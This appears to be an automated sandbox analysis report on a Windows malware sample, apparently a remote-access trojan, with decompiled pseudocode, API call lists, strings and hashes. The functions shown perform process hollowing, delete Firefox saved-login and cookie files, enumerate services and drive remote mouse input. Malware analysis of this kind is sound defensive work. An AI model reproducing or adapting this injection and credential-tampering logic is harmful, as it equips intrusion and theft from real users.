								_t64 = VirtualAllocEx(_t83->hProcess,  *(_t102 + 0x34),  *(_t102 + 0x50), 0x3000, 0x40);
								 *(_t103 - 0x18) = _t64;
								if(_t64 == 0) {
									goto L16;
								} else {
									_t97 =  *(_t103 - 0x24);
									if(WriteProcessMemory(_t83->hProcess, _t64, _t97,  *(_t102 + 0x54), 0) == 0) {
										goto L16;
									} else {
										_t86 = 0;
										while(1) {
											 *(_t103 - 0x14) = _t86;
											_push(0);
											if(_t86 >= ( *(_t102 + 6) & 0x0000ffff)) {
												break;
											}
											WriteProcessMemory(_t83->hProcess,  *((intOrPtr*)(_t86 * 0x28 +  *((intOrPtr*)(_t97 + 0x3c)) + _t97 + 0x104)) +  *(_t103 - 0x18),  *((intOrPtr*)(_t88 + _t97 + 0x10c)) + _t97,  *(_t88 + _t97 + 0x108), ??);
											_t86 =  *(_t103 - 0x14) + 1;
										}
										_t98 =  *(_t103 - 0x28);
										if(WriteProcessMemory( *_t83, _t98->Ebx + 8, _t102 + 0x34, 4, ??) == 0) {
											goto L16;
										} else {
											_t98->Eax =  *((intOrPtr*)(_t102 + 0x28)) +  *(_t103 - 0x18);
											if(SetThreadContext(_t83->hThread, _t98) == 0 || ResumeThread(_t83->hThread) == 0xffffffff) {
												goto L16;
											} else {
												_t51 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t51;
			}

0x00413bea
0x00413bea
0x00413bef
0x00413bfa
0x00413bfd
0x00413bff
0x00413c02
0x00413c05
0x00413c20
0x00413c2b
0x00413da4
0x00413da4
0x00413da8
0x00413c31
0x00413c34
0x00413c3c
0x00000000
0x00413c42
0x00413c4a
0x00413c54
0x00413c59
0x00413c5a
0x00413c5b
0x00413c5c
0x00413c77
0x00000000
0x00413c7d
0x00413c8d
0x00413c8f
0x00413c92
0x00413ca4
0x00000000
0x00413ccc
0x00413ccc
0x00413cd2
0x00413cd7
0x00413cd7
0x00413ce9
0x00413cef
0x00413cf4
0x00000000
0x00413cfa
0x00413cff
0x00413d0e
0x00000000
0x00413d14
0x00413d14
0x00413d16
0x00413d16
0x00413d1d
0x00413d21
0x00000000
0x00000000
0x00413d47
0x00413d50
0x00413d50
0x00413d59
0x00413d70
0x00000000
0x00413d72
0x00413d78
0x00413d8a
0x00000000
0x00413d9a
0x00413d9a
0x00413d9a
0x00413d8a
0x00413d70
0x00413d0e
0x00413cf4
0x00413ca4
0x00413c77
0x00413c3c
0x00413dad
0x00413dba

APIs

__EH_prolog.LIBCMT ref: 00413BEF
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00000000,00000000), ref: 00413C13
GetProcAddress.KERNEL32(00000000), ref: 00413C1A
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00413C6F
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00413C87
GetThreadContext.KERNEL32(?,00000000), ref: 00413C9C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00413CBE
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00413CE9
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00413D06
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00413D47
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00413D68
SetThreadContext.KERNEL32(?,?), ref: 00413D82
ResumeThread.KERNEL32(?), ref: 00413D8F

Strings

ntdll.dll, xrefs: 00413C0E
NtUnmapViewOfSection, xrefs: 00413C09

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 65594003-1050664331
Opcode ID: 8cee7ee2c57220e7e67bb43c82f0a52130700f792b34f2e678217ac4b9000b82
Instruction ID: db873add64a7491379255ca583f95b7608a8f2be36eb053491e5b98f8f44a6e1
Opcode Fuzzy Hash: 8cee7ee2c57220e7e67bb43c82f0a52130700f792b34f2e678217ac4b9000b82
Instruction Fuzzy Hash: 3351B371600601BFDB208F64DE45FABBBB8FF85716F14002AF605E62A1D774D950CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409FCA, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00409FCA(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E0040201F(__ebx,  &_v100);
				E0040201F(__ebx,  &_v76);
				E0040201F(__ebx,  &_v28);
				_t45 = E00401FCE(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401F1B( &_v28, _t46, _t135, E0040713C(_t89,  &_v52, E00438F1A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				E00401F11();
				E00401F11();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(E00401EF9(E004070D2( &_v124,  &_v28, _t142, "*")),  &_v468);
				E00401F11();
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						_t57 = FindNextFileA(_t136,  &_v468);
						__eflags = _t57;
						if(_t57 == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E00401F1B( &_v100, _t61, _t136, E004051FC(_t89,  &_v52, E004070D2( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									E00401F11();
									E00401F11();
									_t128 = E004070D2( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E00401F1B( &_v76, _t67, _t136, E004051FC(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									E00401F11();
									E00401F11();
									_t73 = DeleteFileA(E00401EF9( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E00401EF9( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00401FCE(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040A6A7(_t89, _t128);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00401FCE(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040A6A7(_t89,  &_v28);
					L17:
					E00401F11();
					E00401F11();
					E00401F11();
					return 1;
				}
			}

0x00409fca
0x00409fca
0x00409fca
0x00409fd7
0x00409fdf
0x00409fe7
0x00409ff4
0x0040a014
0x0040a01c
0x0040a024
0x0040a035
0x0040a052
0x0040a054
0x0040a05c
0x0040a192
0x0040a192
0x0040a19a
0x0040a1a0
0x0040a1a2
0x00000000
0x00000000
0x0040a085
0x0040a08c
0x00000000
0x00000000
0x0040a092
0x0040a098
0x0040a09b
0x0040a0a9
0x0040a0a9
0x0040a0af
0x0040a0af
0x0040a0b1
0x0040a0b1
0x0040a0b5
0x0040a0ba
0x0040a0bd
0x0040a0c3
0x00000000
0x00000000
0x0040a0c5
0x0040a0c6
0x0040a0c9
0x00000000
0x00000000
0x0040a0cb
0x0040a0d4
0x0040a0d4
0x0040a0d6
0x0040a106
0x0040a10e
0x0040a119
0x0040a136
0x0040a148
0x0040a153
0x0040a15b
0x0040a169
0x0040a16f
0x0040a171
0x0040a173
0x0040a173
0x0040a182
0x0040a188
0x0040a18a
0x0040a18c
0x0040a18c
0x0040a18a
0x00000000
0x0040a0d6
0x0040a0cf
0x0040a0d1
0x0040a0d1
0x00000000
0x0040a0d1
0x0040a0a1
0x0040a0a3
0x00000000
0x00000000
0x00000000
0x0040a0a3
0x0040a1b2
0x0040a1b7
0x0040a1c0
0x00000000
0x0040a062
0x0040a063
0x0040a073
0x0040a078
0x0040a1c6
0x0040a1c9
0x0040a1d1
0x0040a1d9
0x0040a1e4
0x0040a1e4

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A049
FindClose.KERNEL32(00000000), ref: 0040A063
FindNextFileA.KERNEL32(00000000,?), ref: 0040A19A
FindClose.KERNEL32(00000000), ref: 0040A1C0

Strings

\logins.json, xrefs: 0040A0E2
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 00409FEC
[Firefox StoredLogins Cleared!], xrefs: 0040A1AD
[Firefox StoredLogins not found], xrefs: 0040A06E
\key3.db, xrefs: 0040A124
UserProfile, xrefs: 00409FFA

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: d76bc731f72daf15afe223baf69e9c8cbab393414056e02767057dbec8e83223
Instruction ID: e79a9d5fcf20178d43e62e745f71b8aca943b86623ed7c22088e8b6dfecbfde9
Opcode Fuzzy Hash: d76bc731f72daf15afe223baf69e9c8cbab393414056e02767057dbec8e83223
Instruction Fuzzy Hash: B551A23190421A5ACB18FB71CC56AEEB735AF51308F40017FF506761E3EF785A49CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1E5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A1E5(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t47;
				int _t55;
				signed int _t56;
				signed int _t57;
				signed int _t65;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E0040201F(0,  &_v52);
				E0040201F(0,  &_v28);
				_t35 = L00401FCE(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401F1B( &_v28, _t36, _t109, E0040713C(0,  &_v76, L00438F1A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				L00401F11();
				L00401F11();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(L00401EF9(E004070D2( &_v100,  &_v28, _t116, "*")),  &_v444);
				L00401F11();
				if(_t110 != 0xffffffff) {
					_t47 = FindNextFileA(_t110,  &_v444);
					__eflags = _t47;
					if(_t47 == 0) {
						L17:
						L00401FCE(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						L0040A6A7(0, _t104);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E004070D2( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											L00401F1B( &_v52, _t59, _t110, E004051FC(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											L00401F11();
											L00401F11();
											_t65 = DeleteFileA(L00401EF9( &_v52));
											__eflags = _t65;
											if(_t65 != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							_t55 = FindNextFileA(_t110,  &_v444);
							__eflags = _t55;
						} while (_t55 != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					L00401FCE(0, _t102);
					L0040A6A7(0, _t104);
					L18:
				}
				L19:
				L00401F11();
				L00401F11();
				return 1;
			}

0x0040a1e5
0x0040a1e5
0x0040a1f3
0x0040a1fb
0x0040a208
0x0040a228
0x0040a230
0x0040a238
0x0040a249
0x0040a266
0x0040a268
0x0040a270
0x0040a29d
0x0040a2a3
0x0040a2a5
0x0040a371
0x0040a37b
0x0040a380
0x0040a389
0x00000000
0x0040a2ab
0x0040a2ab
0x0040a2ad
0x0040a2ad
0x0040a2b4
0x00000000
0x0040a2ba
0x0040a2ba
0x0040a2c0
0x0040a2c3
0x0040a2d1
0x0040a2d1
0x0040a2d7
0x0040a2d9
0x0040a2d9
0x0040a2dd
0x0040a2e2
0x0040a2e5
0x0040a2eb
0x00000000
0x00000000
0x0040a2ed
0x0040a2ee
0x0040a2f1
0x00000000
0x0040a2f3
0x0040a2f3
0x0040a2f3
0x0040a2fc
0x0040a2fc
0x0040a2fe
0x00000000
0x0040a300
0x0040a318
0x0040a327
0x0040a32f
0x0040a337
0x0040a345
0x0040a34b
0x0040a34d
0x0040a3b5
0x0040a3b7
0x00000000
0x0040a34f
0x0040a34f
0x0040a356
0x0040a359
0x0040a3aa
0x00000000
0x00000000
0x00000000
0x0040a359
0x0040a34d
0x00000000
0x0040a2fe
0x0040a2f7
0x0040a2f9
0x0040a2f9
0x00000000
0x0040a2c5
0x0040a2c9
0x0040a2cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a2cb
0x0040a2c3
0x00000000
0x0040a35b
0x0040a363
0x0040a369
0x0040a369
0x00000000
0x0040a2ad
0x0040a272
0x0040a273
0x0040a27c
0x0040a27e
0x0040a283
0x0040a283
0x0040a288
0x0040a38f
0x0040a38f
0x0040a391
0x0040a394
0x0040a39c
0x0040a3a8

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A25D
FindClose.KERNEL32(00000000), ref: 0040A273
FindNextFileA.KERNEL32(00000000,?), ref: 0040A29D
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A345
GetLastError.KERNEL32 ref: 0040A34F
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A363
FindClose.KERNEL32(00000000), ref: 0040A389
FindClose.KERNEL32(00000000), ref: 0040A3AA

Strings

\cookies.sqlite, xrefs: 0040A306
[Firefox Cookies not found], xrefs: 0040A27E, 0040A376
[Firefox cookies found, cleared!], xrefs: 0040A3B7
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A200
UserProfile, xrefs: 0040A20E

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: a7721cc422edd3e7c9b5e43a1389d7abb05592eac84db99c3dfd1f5649bf5548
Instruction ID: 7a04562843d55af68eb827bd4a434c594cca28fe4d29f4e8ee373195f56ed32e
Opcode Fuzzy Hash: a7721cc422edd3e7c9b5e43a1389d7abb05592eac84db99c3dfd1f5649bf5548
Instruction Fuzzy Hash: 6E41903190431A5ACB14FBB5CC569EEB738AF11304F5401BFF905B21E2EF395A49CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415B21, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 226
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415B21(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					E00401ED1(_t133,  &_v88);
					_v12 = 0;
					_t5 =  &_v8; // 0x415646
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12, _t5,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E0040320E(_t133, _t198, __eflags,  &_v88);
						E00401E54();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = E00438B8B( &_v88);
					_v36 = _t87;
					_t13 =  &_v8; // 0x415646
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12, _t13,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L00438B86(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00403205(E004042DF(_t133,  &_v112, _t199[1], __eflags, E0040412C(_t133,  &_v64, 0x4649d4)));
						E00401E54();
						E00401E54();
						E00403205(E004042DF(_t133,  &_v64,  *_t199, __eflags, E0040412C(_t133,  &_v112, 0x4649d4)));
						E00401E54();
						E00401E54();
						_t100 = E0040412C(_t133,  &_v136, 0x4649d4);
						E00403205(E00402F24( &_v64, E00416C83(_t133,  &_v112, _t199[3]), _t100));
						E00401E54();
						E00401E54();
						E00401E54();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E00438B8B( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E00403205(E00402F9A(_t133,  &_v136, E00416C83(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4649d4));
								E00401E54();
								E00401E54();
								E00403205(E00402F9A(_t133,  &_v136, E00416C83(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4649d4));
								E00401E54();
								E00401E54();
								E00403205(E00402F9A(_t133,  &_v136, E004042DF(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040412C(_t133,  &_v112, 0x4649d4)), _t199, __eflags, "\n"));
								E00401E54();
								E00401E54();
								E00401E54();
								L00438B86(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0040412C(_t133, _t198, 0x464a0c);
				goto L13;
			}

0x00415b31
0x00415b35
0x00415b3e
0x00415b42
0x00415b58
0x00415b60
0x00415b64
0x00415b67
0x00415b6e
0x00415b85
0x00415b87
0x00415dd0
0x00415dd1
0x00415ddd
0x00415de5
0x00415dea
0x00415df2
0x00415df2
0x00415b93
0x00415b98
0x00000000
0x00000000
0x00415b9e
0x00415ba1
0x00415ba2
0x00415bab
0x00415baf
0x00415bbe
0x00415bc4
0x00415bc6
0x00415bc9
0x00415bcc
0x00415dc7
0x00415dca
0x00000000
0x00415dcf
0x00415bd2
0x00415bd5
0x00415bf3
0x00415bfb
0x00415c03
0x00415c25
0x00415c2d
0x00415c35
0x00415c45
0x00415c65
0x00415c6d
0x00415c75
0x00415c80
0x00415c85
0x00415c8e
0x00415c97
0x00415ca1
0x00415ca7
0x00415ca9
0x00415caf
0x00415cb5
0x00415cb8
0x00415cbe
0x00415cc1
0x00415cc8
0x00415cd0
0x00415cd7
0x00415cfe
0x00415d09
0x00415d11
0x00415d38
0x00415d43
0x00415d4b
0x00415d81
0x00415d8c
0x00415d94
0x00415d9c
0x00415da2
0x00415da7
0x00415daa
0x00415cb8
0x00415dae
0x00415db4
0x00415db5
0x00415db8
0x00415dbb
0x00415dbb
0x00415dc4
0x00000000
0x00415dc4
0x00415b4b
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046AACC,0046B960), ref: 00415B38
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,FVA,?), ref: 00415B7F
GetLastError.KERNEL32(?,0046AACC,0046B960), ref: 00415B8D
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,FVA,?), ref: 00415BBE
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004649D4,00000000,004649D4,00000000,004649D4,?,0046AACC,0046B960), ref: 00415C8E

Strings

FVA, xrefs: 00415B64, 00415BAF, 00415DBB, 00415B6A, 00415BB2

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID: FVA
API String ID: 2247270020-1718395828
Opcode ID: c5129525a98d47010f27c9052ea63c59e1fbe0b43e75933375c584efb9b1e439
Instruction ID: 2dee35889a15102b1a75d9d5f7bd8c213056f8b9dc8ce1fe5d48969105423b02
Opcode Fuzzy Hash: c5129525a98d47010f27c9052ea63c59e1fbe0b43e75933375c584efb9b1e439
Instruction Fuzzy Hash: AC813071D00109ABCB14EBA1DD56AEEB738AF54704F20806FF516B61D1EF786E48CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004149FD, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004149FD(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E004050D0(0)));
				E00404153( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004050D0(0)));
									_t60 = E004050D0(4);
									_t101 =  *0x46ad6c; // 0x0
									_v40 =  *_t60;
									E00414897( *((intOrPtr*)(0x46ad70 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E00414CC9(_v44, _v40);
								}
							} else {
								_t65 = E004050D0(0);
								_v44 =  *((intOrPtr*)(E004050D0(4)));
								_t67 = E004050D0(8);
								_t109 =  *0x46ad6c; // 0x0
								_v44 =  *_t67;
								E00414897( *((intOrPtr*)(0x46ad70 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E00414C6D( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E004050D0(0);
							_v40 =  *((intOrPtr*)(E004050D0(4)));
							_t74 = E004050D0(8);
							_t118 =  *0x46ad6c; // 0x0
							_v48 =  *_t74;
							E00414897( *((intOrPtr*)(0x46ad70 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E00414C11( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E004050D0(4);
						_t80 = E004050D0(3);
						_t81 = E004050D0(2);
						_t82 = E004050D0(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E00414D01( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E004050D0(0);
					_t85 = E004050D0(1);
					E00414015( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004050D0(2)));
					L8:
				}
				E00401F11();
				return E00401F11();
			}

0x004149fd
0x00414a1b
0x00414a22
0x00414a2a
0x00414a69
0x00414a6c
0x00414ac8
0x00414acb
0x00414b28
0x00414b2b
0x00414b89
0x00414b8c
0x00414bda
0x00414bdd
0x00414be4
0x00414be7
0x00414be9
0x00414bea
0x00000000
0x00414bea
0x00414bdf
0x00414bdf
0x00414be0
0x00414bec
0x00414bf3
0x00414bf3
0x00414b8e
0x00414ba0
0x00414ba4
0x00414ba9
0x00414bbc
0x00414bc5
0x00414bd3
0x00414bd3
0x00414b2d
0x00414b32
0x00414b48
0x00414b50
0x00414b55
0x00414b68
0x00414b71
0x00414b81
0x00000000
0x00414b81
0x00414acd
0x00414ad2
0x00414ae8
0x00414af0
0x00414af5
0x00414b08
0x00414b11
0x00414b21
0x00000000
0x00414b21
0x00414a6e
0x00414a74
0x00414a81
0x00414a8e
0x00414a9b
0x00414aa6
0x00414ab0
0x00414abd
0x00000000
0x00414ac2
0x00414a2c
0x00414a31
0x00414a3e
0x00414a5f
0x00414b86
0x00414b86
0x00414bfd
0x00414c10

APIs

StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414A51
mouse_event.USER32 ref: 00414BF3

Part of subcall function 00414897: GetSystemMetrics.USER32 ref: 004148CC
Part of subcall function 00414897: GetSystemMetrics.USER32 ref: 004148E1

Part of subcall function 00414CC9: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00414CF5

Strings

1, xrefs: 00414A69
2, xrefs: 00414AC8
3, xrefs: 00414B28
6, xrefs: 00414BE4
5, xrefs: 00414BDA
0, xrefs: 00414A27
4, xrefs: 00414B89

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MetricsSystem$InputSendmouse_event
String ID: 0$1$2$3$4$5$6
API String ID: 1731092567-2737206560
Opcode ID: 69f3294584151d4bbc983575cb0f2afbb33c32fe8a415b75f911f7a7653dd91e
Instruction ID: 5f2494962fc6e50ea7f4e0da361dee9d89560b8156b2fa0e03f0f9d7b184e4cf
